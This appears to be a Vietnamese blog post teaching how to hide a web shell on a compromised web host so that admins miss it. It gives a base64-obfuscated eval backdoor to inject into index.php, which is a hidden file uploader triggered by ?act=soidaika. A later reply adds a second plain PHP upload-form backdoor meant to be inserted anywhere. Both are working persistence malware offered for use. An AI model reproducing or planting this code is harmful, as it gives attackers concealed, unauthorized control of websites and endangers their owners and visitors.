Bình thường, sau khi đã up dc shell lên host, việc đầu tiên có lẽ là tìm chỗ giấu shell.
Vậy giấu shell làm sao để admin khó biết ?
Có nhiều cách: đặt tên na ná tên các file trên host, giấu ở các folder kín,...
Bài viết sau đây giới thiệu một cách giấu shell khác, khá hữu dụng
Bước 1: Giấu
+ Chọn một file nào đó trên host (VD: index.php)
+ Chèn thêm đoạn code sau vào giữa file:
Code:
eval(base64_decode("Pz48P3BocCBpZihpc3NldCgkX0dFVFsiYWN0Il0pICYmICRfR0VUWyJhY3QiXT09InNvaWRhaWthIil7CgppZihpc3NldCgkX0ZJTEVTWyJGaWxlIl0pKQp7CiRQYXRoPWV4cGxvZGUoIi8iLF9fRklMRV9fKTsKdW5zZXQoJFBhdGhbY291bnQoJFBhdGgpLTFdKTsKJFBhdGg9aW1wbG9kZSgiLyIsJFBhdGgpOwokUGF0aC49Ii8iLiRfRklMRVNbIkZpbGUiXVsibmFtZSJdOwoJaWYgKCRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSA+IDApCgl7CgllY2hvICJFcnJvcjogIiAuICRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSAuICI8YnIgLz4iOwoJfQoJZWxzZSBpZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siRmlsZSJdWyJ0bXBfbmFtZSJdLCRQYXRoKSkKCXsKCWVjaG8gIlN0b3JlZCBpbjogIiAuJFBhdGg7Cgl9Cn0KPz4KPGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4KCTxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJGaWxlIi8+PGlucHV0IHR5cGU9InN1Ym1pdCIvPgo8L2Zvcm0+Cjxici8+CkNvZGVkIGJ5IExlb3JpdXMKPD9waHAKZXhpdDsKfQo/Pjw/"));
Bước 2: Sử dụng
+ Truy cập vào index.php?act=soidaika
========================================================
lang thang có thấy mấy đoạn code này chèn vô index,hóa ra của bạn,
thêm 1 doạn nho nhỏ nè chèn bất kỳ đâu nhé,khó mà mò dc nó
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
0 nhận xét:
Đăng nhận xét